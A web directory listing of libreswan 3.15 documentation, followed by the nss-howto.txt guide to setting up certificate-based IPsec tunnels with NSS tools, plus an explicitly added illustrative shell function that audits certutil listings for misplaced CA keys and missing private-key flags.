Directory: /usr/share/doc/libreswan-3.15/

Name                         Size        Permission
examples                     [ DIR ]     drwxr-xr-x
opportunistic-v1.historic    [ DIR ]     drwxr-xr-x
CHANGES                      44.74 KB    -rw-r--r--
CHANGES.freeswan.pluto       39.58 KB    -rw-r--r--
CHANGES.openswan             71.93 KB    -rw-r--r--
COPYING                      17.57 KB    -rw-r--r--
CREDITS                      867 B       -rw-r--r--
CREDITS.freeswan             2.88 KB     -rw-r--r--
CREDITS.openswan             2.38 KB     -rw-r--r--
LICENSE                      1023 B      -rw-r--r--
PlutoFlow.png                35.25 KB    -rw-r--r--
PlutoFlow.svg                25.92 KB    -rw-r--r--
ProgrammingConventions.txt   5.3 KB      -rw-r--r--
README                       7.42 KB     -rw-r--r--
README.IANA-PEN              214 B       -rw-r--r--
README.KLIPS                 5.84 KB     -rw-r--r--
README.OCF                   39 B        -rw-r--r--
README.XAUTH                 2.71 KB     -rw-r--r--
README.labeledipsec          146 B       -rw-r--r--
README.nss                   10.38 KB    -rw-r--r--
README.rfcs                  6.97 KB     -rw-r--r--
README.x509                  61 B        -rw-r--r--
ipsec.html                   57.27 KB    -rw-r--r--
ipsecsaref.png               159.75 KB   -rw-r--r--
l2tp-overhead.txt            93 B        -rw-r--r--
libreswan-sysctl.conf        525 B       -rw-r--r--
nss-howto.txt                4.05 KB     -rw-r--r--
pluto-internals.txt          14.47 KB    -rw-r--r--
win2k-notes.txt              3.09 KB     -rw-r--r--
windows-cross-compile.txt    3.91 KB     -rw-r--r--
Code Editor : nss-howto.txt
#########################################################################
# Scenario: To setup ipsec with certs in tunnel mode using NSS
#########################################################################

GW Machine 1: w1.x1.y1.z1
GW Machine 2: w2.x2.y2.z2

w1.x1.y1.z1 <---> w2.x2.y2.z2

Note: In this example setup, both machines are using NSS. If you want to use
NSS only at one machine, say machine 1, you can use the following procedure
only at machine 1, and you can use traditional ipsec setup at machine 2.

1. Create a new NSS database (if one does not already exist) on both machines:

    certutil -N -d sql:<path-to-ipsec.d dir>/ipsec.d

   (Note the "sql:" prefix at the beginning of every database path.)

2. Creating CA certs at both machines:

   On machine 1:

    certutil -S -k rsa -n cacert1 -s "CN=cacert1" -v 12 -t "C,C,C" -x -d sql:<path-to-ipsec.d dir>/ipsec.d

   As we want to use the same certificate "cacert1" at machine 2, it needs to
   be exported first. To export cacert1, do the following at machine 1:

    pk12util -o cacert1.p12 -n cacert1 -d sql:/etc/ipsec.d

   Copy the file "cacert1.p12" to machine 2, into the "/etc/ipsec.d" directory.

   On machine 2, import "cacert1" as follows:

    cd /etc/ipsec.d
    pk12util -i cacert1.p12 -d sql:/etc/ipsec.d
    certutil -M -n cacert1 -t "C,C,C" -d sql:/etc/ipsec.d

   Now machine 2 also has the CA certificate "cacert1" in its NSS database.

3. Creating user certs at both machines:

   On machine 1:

    certutil -S -k rsa -c cacert1 -n usercert1 -s "CN=usercert1" -v 12 -t "u,u,u" -d sql:/etc/ipsec.d

   (Note this cert is signed by "cacert1")

   On machine 2:

    certutil -S -k rsa -c cacert1 -n usercert2 -s "CN=usercert2" -v 12 -t "u,u,u" -d sql:/etc/ipsec.d

   (Note this cert is signed by "cacert1" too)

4. Preparing ipsec.conf at both machines

   ipsec.conf at machine 1:

    conn pluto-1-2
        left=w1.x1.y1.z1
        leftid="CN=usercert1"
        leftsourceip=w1.x1.y1.z1
        leftrsasigkey=%cert
        leftcert=usercert1
        leftnexthop=w2.x2.y2.z2
        right=w2.x2.y2.z2
        rightid="CN=usercert2"
        rightsourceip=w2.x2.y2.z2
        rightrsasigkey=%cert
        rightnexthop=w1.x1.y1.z1
        rekey=no
        esp="aes-sha1"
        ike="aes-sha1"
        auto=add

   ipsec.conf at machine 2:

    conn pluto-1-2
        left=w2.x2.y2.z2
        leftid="CN=usercert2"
        leftsourceip=w2.x2.y2.z2
        leftrsasigkey=%cert
        leftcert=usercert2
        leftnexthop=w1.x1.y1.z1
        right=w1.x1.y1.z1
        rightid="CN=usercert1"
        rightsourceip=w1.x1.y1.z1
        rightrsasigkey=%cert
        rightnexthop=w2.x2.y2.z2
        rekey=no
        esp="aes-sha1"
        ike="aes-sha1"
        auto=add

5. Preparing ipsec.secrets at both machines

   ipsec.secrets at machine 1:

    : RSA usercert1

   ipsec.secrets at machine 2:

    : RSA usercert2

#########################################################################
# Import certificates
#########################################################################

This example shows how to import certificates into NSS. It is useful if you
want to migrate from openswan to libreswan.

Import a CA:

    certutil -A -i <ca_cert_file> -n "<ca_cert_alias>" -t "C,C,C" -d /etc/ipsec.d/

  example:

    certutil -A -i /etc/ipsec.d/cacerts/CaCert.pem -n "CaCert" -t "C,C,C" -d /etc/ipsec.d/

Import a cert:

    certutil -A -i <cert_file> -n "<cert_alias>" -t "C,C,C" -d /etc/ipsec.d/

  example:

    certutil -A -i /etc/ipsec.d/certs/serverCert.pem -n "serverCert" -t "C,C,C" -d /etc/ipsec.d/

Import a client cert:

    certutil -A -i <cert_file> -n "<cert_alias>" -t "u,u,u" -d /etc/ipsec.d/

  example:

    certutil -A -i /etc/ipsec.d/certs/userCert.pem -n "userCert" -t "u,u,u" -d /etc/ipsec.d/

Convert key:

    openssl pkcs12 -export -in /etc/ipsec.d/certs/userCert.pem -inkey /etc/ipsec.d/private/userKey.pem -name "userCert" -out /etc/ipsec.d/private/userKey.p12

Import Key:

    pk12util -i /etc/ipsec.d/private/userKey.p12 -d /etc/ipsec.d

In your secret file you can use:

    : RSA "userCert"

Show a list of the current certificates and trust attributes in a certificate
database:

    certutil -L -d /etc/ipsec.d/
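
Added example (not part of nss-howto.txt or of libreswan): a check over `certutil -L` output for the setup above. It confirms that the nickname used in leftcert= and ipsec.secrets has a private key (the "u" flag) and no CA trust, and it reports any CA-trusted entry whose private key is also in the database, which is the state step 2 creates on both gateways because pk12util exports the key along with the certificate. The function names and the sample listing are constructed for illustration.

```shell
#!/bin/sh
# Usage: certutil -L -d sql:/etc/ipsec.d | audit_nss_listing usercert1
# Prints one finding per line; prints nothing when no issue is found.
audit_nss_listing() {
    awk -v want="$1" '
    # Data rows end in a trust field such as "u,u,u" or "CTu,Cu,Cu".
    # Header rows ("Trust Attributes", "SSL,S/MIME,JAR/XPI") do not match.
    $NF ~ /^[A-Za-z]*,[A-Za-z]*,[A-Za-z]*$/ {
        trust = $NF
        nick = $0
        sub(/[ \t]+[^ \t]+[ \t]*$/, "", nick)   # drop the trust column
        sub(/^[ \t]+/, "", nick)                # nicknames may contain spaces
        split(trust, f, ",")
        has_key = (trust ~ /u/)     # "u": private key present in this database
        is_ca = (f[1] ~ /[CT]/)     # SSL column carries CA trust
        if (is_ca && has_key)
            print "WARN " nick ": CA trust and private key in the same database"
        if (nick == want) {
            seen = 1
            if (!has_key) print "FAIL " nick ": no private key (missing u flag)"
            if (is_ca) print "FAIL " nick ": end-entity cert carries CA trust"
        }
    }
    END { if (!seen) print "FAIL " want ": nickname not found" }
    '
}

# Constructed sample in the layout certutil -L prints (not captured output).
sample_listing() {
    cat <<'EOF'

Certificate Nickname                                         Trust Attributes
                                                             SSL,S/MIME,JAR/XPI

cacert1                                                      CTu,Cu,Cu
usercert1                                                    u,u,u
EOF
}

sample_listing | audit_nss_listing usercert1
```

A WARN line on a gateway means that host can sign new certificates under the CA; keeping the CA key on a separate machine and importing only the CA certificate with certutil -A, as in the import section above, avoids that.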